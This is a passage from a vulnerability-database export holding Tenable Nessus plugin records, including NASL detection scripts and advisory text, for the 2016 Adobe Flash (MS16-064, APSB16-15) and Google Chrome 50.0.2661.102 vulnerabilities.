\"CVE-2016-1106\",\n \"CVE-2016-1107\",\n \"CVE-2016-1108\",\n \"CVE-2016-1109\",\n \"CVE-2016-1110\",\n \"CVE-2016-4108\",\n \"CVE-2016-4109\",\n \"CVE-2016-4110\",\n \"CVE-2016-4111\",\n \"CVE-2016-4112\",\n \"CVE-2016-4113\",\n \"CVE-2016-4114\",\n \"CVE-2016-4115\",\n \"CVE-2016-4116\",\n \"CVE-2016-4117\",\n \"CVE-2016-4120\",\n \"CVE-2016-4121\",\n \"CVE-2016-4160\",\n \"CVE-2016-4161\",\n \"CVE-2016-4162\",\n \"CVE-2016-4163\"\n );\n script_bugtraq_id(90505);\n script_xref(name:\"MSFT\", value:\"MS16-064\");\n script_xref(name:\"MSKB\", value:\"3163207\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"MS16-064: Security Update for Adobe Flash Player (3163207)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing KB3163207. It is, therefore,\naffected by multiple vulnerabilities :\n\n - Multiple type confusion errors exist that allow an\n attacker to execute arbitrary code. (CVE-2016-1105,\n CVE-2016-4117)\n\n - Multiple use-after-free errors exist that allow an\n attacker to execute arbitrary code. (CVE-2016-1097,\n CVE-2016-1106, CVE-2016-1107, CVE-2016-1108,\n CVE-2016-1109, CVE-2016-1110, CVE-2016-4108,\n CVE-2016-4110, CVE-2016-4121)\n\n - A heap buffer overflow condition exists that allows an\n attacker to execute arbitrary code. (CVE-2016-1101)\n\n - An unspecified buffer overflow exists that allows an\n attacker to execute arbitrary code. (CVE-2016-1103)\n\n - Multiple memory corruption issues exist that allow an\n attacker to execute arbitrary code. 
(CVE-2016-1096,\n CVE-2016-1098, CVE-2016-1099, CVE-2016-1100,\n CVE-2016-1102, CVE-2016-1104, CVE-2016-4109,\n CVE-2016-4111, CVE-2016-4112, CVE-2016-4113,\n CVE-2016-4114, CVE-2016-4115, CVE-2016-4120,\n CVE-2016-4160, CVE-2016-4161, CVE-2016-4162,\n CVE-2016-4163)\n\n - A flaw exists when loading dynamic-link libraries. An\n attacker can exploit this, via a specially crafted .dll\n file, to execute arbitrary code. (CVE-2016-4116)\n\nNote: KB3163207 replaces KB3157993 which did not address CVE-2016-4117.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2016/ms16-064\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-15.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows 2012, 8.1, RT 8.1,\n2012 R2, and 10.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-4117\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
value:\"2016/05/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_activex_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS16-064\";\nkbs = make_list(\"3163207\");\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0', win81:'0', win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nif (activex_init() != ACX_OK) audit(AUDIT_FN_FAIL, \"activex_init()\");\n\n# Adobe Flash Player CLSID\nclsid = '{D27CDB6E-AE6D-11cf-96B8-444553540000}';\n\nfile = activex_get_filename(clsid:clsid);\nif (isnull(file))\n{\n activex_end();\n audit(AUDIT_FN_FAIL, \"activex_get_filename\", \"NULL\");\n}\nif (!file)\n{\n activex_end();\n audit(AUDIT_ACTIVEX_NOT_FOUND, clsid);\n}\n\n# Get its version.\nversion = activex_get_fileversion(clsid:clsid);\nif (!version)\n{\n activex_end();\n audit(AUDIT_VER_FAIL, file);\n}\n\ninfo = '';\n\niver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(iver); i++)\n iver[i] = 
int(iver[i]);\niver = join(iver, sep:\".\");\n\n# all <= 18.0.0.343 or 19 < 21.0.0.213\nfix = FALSE;\nif(iver =~ \"^(19|2[01])\\.\" && ver_compare(ver:iver, fix:\"21.0.0.241\", strict:FALSE) <= 0)\n fix = \"21.0.0.242\";\nelse if(ver_compare(ver:iver, fix:\"18.0.0.343\", strict:FALSE) <= 0)\n fix = \"18.0.0.352\";\n\nif (\n (report_paranoia > 1 || activex_get_killbit(clsid:clsid) == 0) &&\n fix\n)\n{\n info = '\\n Path : ' + file +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n}\n\nport = kb_smb_transport();\n\nif (info != '')\n{\n if (report_paranoia > 1)\n {\n report = info +\n '\\n' +\n 'Note, though, that Nessus did not check whether the kill bit was\\n' +\n \"set for the control's CLSID because of the Report Paranoia setting\" + '\\n' +\n 'in effect when this scan was run.\\n';\n }\n else\n {\n report = info +\n '\\n' +\n 'Moreover, its kill bit is not set so it is accessible via Internet\\n' +\n 'Explorer.\\n';\n }\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_add_report(bulletin:'MS16-064', kb:'3163207', report);\n security_report_v4(severity:SECURITY_HOLE, port:port, extra:hotfix_get_report());\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:41:36", "description": "Versions of Adobe Flash Player prior to 11.2.202.621, 18.0.0.352, or 21.0.0.242 are outdated and thus unpatched for the following vulnerabilities :\n\n - Multiple type confusion errors exist that allow an attacker to execute arbitrary code. (CVE-2016-1105, CVE-2016-4117)\n - Multiple use-after-free errors exist that allow an attacker to execute arbitrary code. (CVE-2016-1097, CVE-2016-1106, CVE-2016-1107, CVE-2016-1108, CVE-2016-1109, CVE-2016-1110, CVE-2016-4108, CVE-2016-4110, CVE-2016-4121)\n - A heap buffer overflow condition exists that allows an attacker to execute arbitrary code. 
(CVE-2016-1101)\n - An unspecified buffer overflow exists that allows an attacker to execute arbitrary code. (CVE-2016-1103)\n - Multiple memory corruption issues exist that allow an attacker to execute arbitrary code. (CVE-2016-1096, CVE-2016-1098, CVE-2016-1099, CVE-2016-1100, CVE-2016-1102, CVE-2016-1104, CVE-2016-4109, CVE-2016-4111, CVE-2016-4112, CVE-2016-4113, CVE-2016-4114, CVE-2016-4115, CVE-2016-4120, CVE-2016-4160, CVE-2016-4161, CVE-2016-4162, CVE-2016-4163)\n - A flaw exists when loading dynamic-link libraries. An attacker can exploit this, via a specially crafted '.dll' file, to execute arbitrary code. (CVE-2016-4116)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-06-15T00:00:00", "type": "nessus", "title": "Flash Player < 11.2.202.621 / 18.0.0.352 / 21.0.0.242 Multiple Vulnerabilities (APSB16-15)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1096", "CVE-2016-1097", "CVE-2016-1098", "CVE-2016-1099", "CVE-2016-1100", "CVE-2016-1101", "CVE-2016-1102", "CVE-2016-1103", "CVE-2016-1104", "CVE-2016-1105", "CVE-2016-1106", "CVE-2016-1107", "CVE-2016-1108", "CVE-2016-1109", "CVE-2016-1110", "CVE-2016-4108", "CVE-2016-4109", "CVE-2016-4110", "CVE-2016-4111", "CVE-2016-4112", "CVE-2016-4113", "CVE-2016-4114", "CVE-2016-4115", "CVE-2016-4116", "CVE-2016-4117", "CVE-2016-4120", "CVE-2016-4121", "CVE-2016-4160", "CVE-2016-4161", "CVE-2016-4162", "CVE-2016-4163"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:adobe:flash_player:*:*:*:*:*:*:*:*"], "id": "9354.PRM", "href": "https://www.tenable.com/plugins/nnm/9354", "sourceData": "Binary data 9354.prm", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:57:21", "description": "The version of Google Chrome installed on the remote host is prior to 50.0.2661.102, and is affected by multiple vulnerabilities :\n\n - A same-origin bypass vulnerability exists in DOM due to scripts being 
permitted to run while a node is being adopted. A context-dependent attacker can exploit this to bypass the same-origin policy. (CVE-2016-1667)\n - A same-origin bypass vulnerability exists due to a flaw in the Blink V8 bindings. A context-dependent attacker can exploit this to bypass the same-origin policy. (CVE-2016-1668)\n - An overflow condition exists in V8 due to improper validation of user-supplied input. A context-dependent attacker can exploit this to cause a denial of service condition or the execution of arbitrary code. (CVE-2016-1669)\n - A race condition exists in the loader related to the use of ids. An attacker can exploit this to have an unspecified impact. (CVE-2016-1670)\n\nThe following vulnerabilities affect the bundled version of Flash Player in Chrome :\n\n - Multiple type confusion errors exist that allow an attacker to execute arbitrary code. (CVE-2016-1105, CVE-2016-4117)\n - Multiple use-after-free errors exist that allow an attacker to execute arbitrary code. (CVE-2016-1097, CVE-2016-1106, CVE-2016-1107, CVE-2016-1108, CVE-2016-1109, CVE-2016-1110, CVE-2016-4108, CVE-2016-4110, CVE-2016-4121)\n - A heap buffer overflow condition exists that allows an attacker to execute arbitrary code. (CVE-2016-1101)\n - An unspecified buffer overflow exists that allows an attacker to execute arbitrary code. (CVE-2016-1103)\n - Multiple memory corruption issues exist that allow an attacker to execute arbitrary code. (CVE-2016-1096, CVE-2016-1098, CVE-2016-1099, CVE-2016-1100, CVE-2016-1102, CVE-2016-1104, CVE-2016-4109, CVE-2016-4111, CVE-2016-4112, CVE-2016-4113, CVE-2016-4114, CVE-2016-4115, CVE-2016-4120, CVE-2016-4160, CVE-2016-4161, CVE-2016-4162, CVE-2016-4163)\n - A flaw exists when loading dynamic-link libraries. An attacker can exploit this, via a specially crafted .dll file, to execute arbitrary code. 
(CVE-2016-4116)", "cvss3": {"score": null, "vector": null}, "published": "2016-06-16T00:00:00", "type": "nessus", "title": "Google Chrome < 50.0.2661.102 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1096", "CVE-2016-1097", "CVE-2016-1098", "CVE-2016-1099", "CVE-2016-1100", "CVE-2016-1101", "CVE-2016-1102", "CVE-2016-1103", "CVE-2016-1104", "CVE-2016-1105", "CVE-2016-1106", "CVE-2016-1107", "CVE-2016-1108", "CVE-2016-1109", "CVE-2016-1110", "CVE-2016-1667", "CVE-2016-1668", "CVE-2016-1669", "CVE-2016-1670", "CVE-2016-4108", "CVE-2016-4109", "CVE-2016-4110", "CVE-2016-4111", "CVE-2016-4112", "CVE-2016-4113", "CVE-2016-4114", "CVE-2016-4115", "CVE-2016-4116", "CVE-2016-4117", "CVE-2016-4120", "CVE-2016-4121", "CVE-2016-4160", "CVE-2016-4161", "CVE-2016-4162", "CVE-2016-4163"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*"], "id": "9371.PASL", "href": "https://www.tenable.com/plugins/nnm/9371", "sourceData": "Binary data 9371.pasl", "cvss": {"score": 9.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-18T15:12:06", "description": "The version of Google Chrome installed on the remote Windows host is prior to 50.0.2661.102. It is, therefore, affected by multiple vulnerabilities :\n\n - A same-origin bypass vulnerability exists in DOM due to scripts being permitted to run while a node is being adopted. A context-dependent attacker can exploit this to bypass the same-origin policy. (CVE-2016-1667)\n\n - A same-origin bypass vulnerability exists due to a flaw in the Blink V8 bindings. A context-dependent attacker can exploit this to bypass the same-origin policy.\n (CVE-2016-1668)\n\n - An overflow condition exists in V8 due to improper validation of user-supplied input. 
A context-dependent attacker can exploit this to cause a denial of service condition or the execution of arbitrary code.\n (CVE-2016-1669)\n\n - A race condition exists in the loader related to the use of ids. An attacker can exploit this to have an unspecified impact. (CVE-2016-1670)\n\n - Multiple type confusion errors exist in the bundled version of Adobe Flash that allow an attacker to execute arbitrary code. (CVE-2016-1105, CVE-2016-4117)\n\n - Multiple use-after-free errors exist in the bundled version of Adobe Flash that allow an attacker to execute arbitrary code. (CVE-2016-1097, CVE-2016-1106, CVE-2016-1107, CVE-2016-1108, CVE-2016-1109, CVE-2016-1110, CVE-2016-4108, CVE-2016-4110, CVE-2016-4121)\n\n - A heap buffer overflow condition exists in the bundled version of Adobe Flash that allows an attacker to execute arbitrary code. (CVE-2016-1101)\n\n - An unspecified buffer overflow exists in the bundled version of Adobe Flash that allows an attacker to execute arbitrary code. (CVE-2016-1103)\n\n - Multiple memory corruption issues exist in the bundled version of Adobe Flash that allow an attacker to execute arbitrary code. (CVE-2016-1096, CVE-2016-1098, CVE-2016-1099, CVE-2016-1100, CVE-2016-1102, CVE-2016-1104, CVE-2016-4109, CVE-2016-4111, CVE-2016-4112, CVE-2016-4113, CVE-2016-4114, CVE-2016-4115, CVE-2016-4120, CVE-2016-4160, CVE-2016-4161, CVE-2016-4162, CVE-2016-4163)\n\n - A flaw exists in the bundled version of Adobe Flash when loading dynamic-link libraries. An attacker can exploit this, via a specially crafted .dll file, to execute arbitrary code. 
(CVE-2016-4116)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-13T00:00:00", "type": "nessus", "title": "Google Chrome < 50.0.2661.102 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1096", "CVE-2016-1097", "CVE-2016-1098", "CVE-2016-1099", "CVE-2016-1100", "CVE-2016-1101", "CVE-2016-1102", "CVE-2016-1103", "CVE-2016-1104", "CVE-2016-1105", "CVE-2016-1106", "CVE-2016-1107", "CVE-2016-1108", "CVE-2016-1109", "CVE-2016-1110", "CVE-2016-1667", "CVE-2016-1668", "CVE-2016-1669", "CVE-2016-1670", "CVE-2016-4108", "CVE-2016-4109", "CVE-2016-4110", "CVE-2016-4111", "CVE-2016-4112", "CVE-2016-4113", "CVE-2016-4114", "CVE-2016-4115", "CVE-2016-4116", "CVE-2016-4117", "CVE-2016-4120", "CVE-2016-4121", "CVE-2016-4160", "CVE-2016-4161", "CVE-2016-4162", "CVE-2016-4163"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_50_0_2661_102.NASL", "href": "https://www.tenable.com/plugins/nessus/91128", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91128);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2016-1096\",\n \"CVE-2016-1097\",\n \"CVE-2016-1098\",\n \"CVE-2016-1099\",\n \"CVE-2016-1100\",\n \"CVE-2016-1101\",\n \"CVE-2016-1102\",\n \"CVE-2016-1103\",\n \"CVE-2016-1104\",\n \"CVE-2016-1105\",\n \"CVE-2016-1106\",\n \"CVE-2016-1107\",\n \"CVE-2016-1108\",\n \"CVE-2016-1109\",\n \"CVE-2016-1110\",\n \"CVE-2016-1667\",\n \"CVE-2016-1668\",\n \"CVE-2016-1669\",\n \"CVE-2016-1670\",\n \"CVE-2016-4108\",\n \"CVE-2016-4109\",\n \"CVE-2016-4110\",\n \"CVE-2016-4111\",\n \"CVE-2016-4112\",\n \"CVE-2016-4113\",\n \"CVE-2016-4114\",\n \"CVE-2016-4115\",\n \"CVE-2016-4116\",\n \"CVE-2016-4117\",\n \"CVE-2016-4120\",\n 
\"CVE-2016-4121\",\n \"CVE-2016-4160\",\n \"CVE-2016-4161\",\n \"CVE-2016-4162\",\n \"CVE-2016-4163\"\n );\n script_bugtraq_id(90505);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"Google Chrome < 50.0.2661.102 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is\nprior to 50.0.2661.102. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A same-origin bypass vulnerability exists in DOM due to\n scripts being permitted run while a node is being\n adopted. A context-dependent attacker can exploit this\n to bypass the same-origin policy. (CVE-2016-1667)\n\n - A same-origin bypass vulnerability exists due to a flaw\n in the Blink V8 bindings. A context-dependent attacker\n can exploit this to bypass the same-origin policy.\n (CVE-2016-1668)\n\n - An overflow condition exists in V8 due to improper\n validation of user-supplied input. A context-dependent\n attacker can exploit this to cause a denial of service\n condition or the execution of arbitrary code.\n (CVE-2016-1669)\n\n - A race condition exists in the loader related to the use\n of ids. An attacker can exploit this to have an\n unspecified impact. (CVE-2016-1670)\n\n - Multiple type confusion errors exist in the bundled\n version of Adobe Flash that allow an attacker to execute\n arbitrary code. (CVE-2016-1105, CVE-2016-4117)\n\n - Multiple use-after-free errors exist in the bundled\n version of Adobe Flash that allow an attacker to execute\n arbitrary code. 
(CVE-2016-1097, CVE-2016-1106,\n CVE-2016-1107, CVE-2016-1108, CVE-2016-1109,\n CVE-2016-1110, CVE-2016-4108, CVE-2016-4110, \n CVE-2016-4121)\n\n - A heap buffer overflow condition exists in the bundled\n version of Adobe Flash that allows an attacker to\n execute arbitrary code. (CVE-2016-1101)\n\n - An unspecified buffer overflow exists in the bundled\n version of Adobe Flash that allows an attacker to\n execute arbitrary code. (CVE-2016-1103)\n\n - Multiple memory corruption issues exist in the bundled\n version of Adobe Flash that allow an attacker to execute\n arbitrary code. (CVE-2016-1096, CVE-2016-1098,\n CVE-2016-1099, CVE-2016-1100, CVE-2016-1102,\n CVE-2016-1104, CVE-2016-4109, CVE-2016-4111,\n CVE-2016-4112, CVE-2016-4113, CVE-2016-4114,\n CVE-2016-4115, CVE-2016-4120, CVE-2016-4160,\n CVE-2016-4161, CVE-2016-4162, CVE-2016-4163)\n\n - A flaw exists in the bundled version of Adobe Flash when\n loading dynamic-link libraries. An attacker can exploit\n this, via a specially crafted .dll file, to execute\n arbitrary code. 
(CVE-2016-4116)\");\n # http://googlechromereleases.blogspot.com/2016/05/stable-channel-update.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ddef1fa8\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-15.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 50.0.2661.102 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-4117\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"SMB/Google_Chrome/Installed\");\ninstalls = get_kb_list(\"SMB/Google_Chrome/*\");\n\ngoogle_chrome_check_version(installs:installs, fix:'50.0.2661.102', severity:SECURITY_HOLE);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-18T15:11:12", "description": "The version of Google Chrome installed on the remote Mac OS X host is prior to 50.0.2661.102. It is, therefore, affected by multiple vulnerabilities :\n\n - A same-origin bypass vulnerability exists in DOM due to scripts being permitted run while a node is being adopted. A context-dependent attacker can exploit this to bypass the same-origin policy. (CVE-2016-1667)\n\n - A same-origin bypass vulnerability exists due to a flaw in the Blink V8 bindings. A context-dependent attacker can exploit this to bypass the same-origin policy.\n (CVE-2016-1668)\n\n - An overflow condition exists in V8 due to improper validation of user-supplied input. A context-dependent attacker can exploit this to cause a denial of service condition or the execution of arbitrary code.\n (CVE-2016-1669)\n\n - A race condition exists in the loader related to the use of ids. An attacker can exploit this to have an unspecified impact. (CVE-2016-1670)\n\n - Multiple type confusion errors exist in the bundled version of Adobe Flash that allow an attacker to execute arbitrary code. (CVE-2016-1105, CVE-2016-4117)\n\n - Multiple use-after-free errors exist in the bundled version of Adobe Flash that allow an attacker to execute arbitrary code. 
(CVE-2016-1097, CVE-2016-1106, CVE-2016-1107, CVE-2016-1108, CVE-2016-1109, CVE-2016-1110, CVE-2016-4108, CVE-2016-4110, CVE-2016-4121)\n\n - A heap buffer overflow condition exists in the bundled version of Adobe Flash that allows an attacker to execute arbitrary code. (CVE-2016-1101)\n\n - An unspecified buffer overflow exists in the bundled version of Adobe Flash that allows an attacker to execute arbitrary code. (CVE-2016-1103)\n\n - Multiple memory corruption issues exist in the bundled version of Adobe Flash that allow an attacker to execute arbitrary code. (CVE-2016-1096, CVE-2016-1098, CVE-2016-1099, CVE-2016-1100, CVE-2016-1102, CVE-2016-1104, CVE-2016-4109, CVE-2016-4111, CVE-2016-4112, CVE-2016-4113, CVE-2016-4114, CVE-2016-4115, CVE-2016-4120, CVE-2016-4160, CVE-2016-4161, CVE-2016-4162, CVE-2016-4163)\n\n - A flaw exists in the bundled version of Adobe Flash when loading dynamic-link libraries. An attacker can exploit this, via a specially crafted .dll file, to execute arbitrary code. 
(CVE-2016-4116)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-13T00:00:00", "type": "nessus", "title": "Google Chrome < 50.0.2661.102 Multiple Vulnerabilities (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1096", "CVE-2016-1097", "CVE-2016-1098", "CVE-2016-1099", "CVE-2016-1100", "CVE-2016-1101", "CVE-2016-1102", "CVE-2016-1103", "CVE-2016-1104", "CVE-2016-1105", "CVE-2016-1106", "CVE-2016-1107", "CVE-2016-1108", "CVE-2016-1109", "CVE-2016-1110", "CVE-2016-1667", "CVE-2016-1668", "CVE-2016-1669", "CVE-2016-1670", "CVE-2016-4108", "CVE-2016-4109", "CVE-2016-4110", "CVE-2016-4111", "CVE-2016-4112", "CVE-2016-4113", "CVE-2016-4114", "CVE-2016-4115", "CVE-2016-4116", "CVE-2016-4117", "CVE-2016-4120", "CVE-2016-4121", "CVE-2016-4160", "CVE-2016-4161", "CVE-2016-4162", "CVE-2016-4163"], "modified": "2022-03-08T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_50_0_2661_102.NASL", "href": "https://www.tenable.com/plugins/nessus/91129", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91129);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2016-1096\",\n \"CVE-2016-1097\",\n \"CVE-2016-1098\",\n \"CVE-2016-1099\",\n \"CVE-2016-1100\",\n \"CVE-2016-1101\",\n \"CVE-2016-1102\",\n \"CVE-2016-1103\",\n \"CVE-2016-1104\",\n \"CVE-2016-1105\",\n \"CVE-2016-1106\",\n \"CVE-2016-1107\",\n \"CVE-2016-1108\",\n \"CVE-2016-1109\",\n \"CVE-2016-1110\",\n \"CVE-2016-1667\",\n \"CVE-2016-1668\",\n \"CVE-2016-1669\",\n \"CVE-2016-1670\",\n \"CVE-2016-4108\",\n \"CVE-2016-4109\",\n \"CVE-2016-4110\",\n \"CVE-2016-4111\",\n \"CVE-2016-4112\",\n \"CVE-2016-4113\",\n \"CVE-2016-4114\",\n \"CVE-2016-4115\",\n \"CVE-2016-4116\",\n \"CVE-2016-4117\",\n 
\"CVE-2016-4120\",\n \"CVE-2016-4121\",\n \"CVE-2016-4160\",\n \"CVE-2016-4161\",\n \"CVE-2016-4162\",\n \"CVE-2016-4163\"\n );\n script_bugtraq_id(90505);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"Google Chrome < 50.0.2661.102 Multiple Vulnerabilities (Mac OS X)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Mac OS X host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Mac OS X host is\nprior to 50.0.2661.102. It is, therefore, affected by multiple\nvulnerabilities :\n\n - A same-origin bypass vulnerability exists in DOM due to\n scripts being permitted run while a node is being\n adopted. A context-dependent attacker can exploit this\n to bypass the same-origin policy. (CVE-2016-1667)\n\n - A same-origin bypass vulnerability exists due to a flaw\n in the Blink V8 bindings. A context-dependent attacker\n can exploit this to bypass the same-origin policy.\n (CVE-2016-1668)\n\n - An overflow condition exists in V8 due to improper\n validation of user-supplied input. A context-dependent\n attacker can exploit this to cause a denial of service\n condition or the execution of arbitrary code.\n (CVE-2016-1669)\n\n - A race condition exists in the loader related to the use\n of ids. An attacker can exploit this to have an\n unspecified impact. (CVE-2016-1670)\n\n - Multiple type confusion errors exist in the bundled\n version of Adobe Flash that allow an attacker to execute\n arbitrary code. (CVE-2016-1105, CVE-2016-4117)\n\n - Multiple use-after-free errors exist in the bundled\n version of Adobe Flash that allow an attacker to execute\n arbitrary code. 
